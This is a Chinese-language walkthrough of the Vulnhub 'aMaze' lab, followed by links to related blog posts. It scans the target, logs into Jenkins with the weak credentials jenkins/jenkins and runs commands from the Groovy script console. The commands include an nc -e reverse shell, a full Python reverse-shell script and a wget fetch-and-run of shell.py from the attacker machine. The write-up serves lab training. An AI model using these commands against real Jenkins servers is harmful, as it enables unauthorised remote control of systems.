Vulnhub靶机:aMaze

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:aMaze(10.0.2.9)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/amaze-1,573/

二、信息收集

使用nmap主机发现靶机ip10.0.2.10

使用nmap端口扫描发现靶机开放端口:21、22、80、8000

80端口使用dirsearch爆破目录,发现一个登录界面

8000端口使用dirsearch爆破目录,每爆破出什么来,打开网站是Jenkins中间件登录界面


三、漏洞利用

jenkins中间件的漏洞网上很多,但尝试了一些poc,都不行。后面尝试弱口令

jenkins/jenkins成功登录。

点击系统管理,下拉找到脚本控制台,点击脚本控制台,执行并打印系统命令

复制代码
println "whoami".execute().text

使用nc反弹shell成功,root权限

复制代码
println "nc -e /bin/bash 10.0.2.15 8888".execute().text

还可以使用python提权,将python脚本通过web上传到靶机,启动nc监听8888端口,并运行

python 复制代码
#!/usr/bin/python
# This is a Python reverse shell script

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.2.15",8888));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);
复制代码
#在靶机执行命令
println "wget http://10.0.2.15/shell.py".execute().text
println "python3 shell.py".execute().text

寻找不到flag

相关推荐
zl0_00_025 分钟前
rce漏洞学习
学习·安全·web安全
ALe要立志成为web糕手32 分钟前
数据库脱裤
数据库·windows·mysql·web安全·网络安全·adb·mssql
暴躁的小胡!!!2 小时前
2025年最新Web安全(面试题)
网络·安全·web安全
Fanche4049 小时前
SQL 语句基础(增删改查)
运维·数据库·sql·mysql·web安全·oracle
it技术分享just_free19 小时前
软考教材重点内容 信息安全工程师 第22章 网站安全需求分析与安全保护工程
web安全·网络安全·信息安全·系统安全·软考
ICT系统集成阿祥21 小时前
100 个网络安全基础知识
安全·web安全
Lovely_1821 小时前
DDoS(分布式拒绝服务)攻击
web安全
计算机鬼才~1 天前
网络安全·第四天·扫描工具Nmap的运用
网络·tcp/ip·安全·web安全·nmap
事业运财运爆棚1 天前
ssh 三级跳
服务器·web安全·ssh
virelin_Y.lin1 天前
系统与网络安全------网络通信原理(5)
网络·安全·web安全·udp·tcp·传输层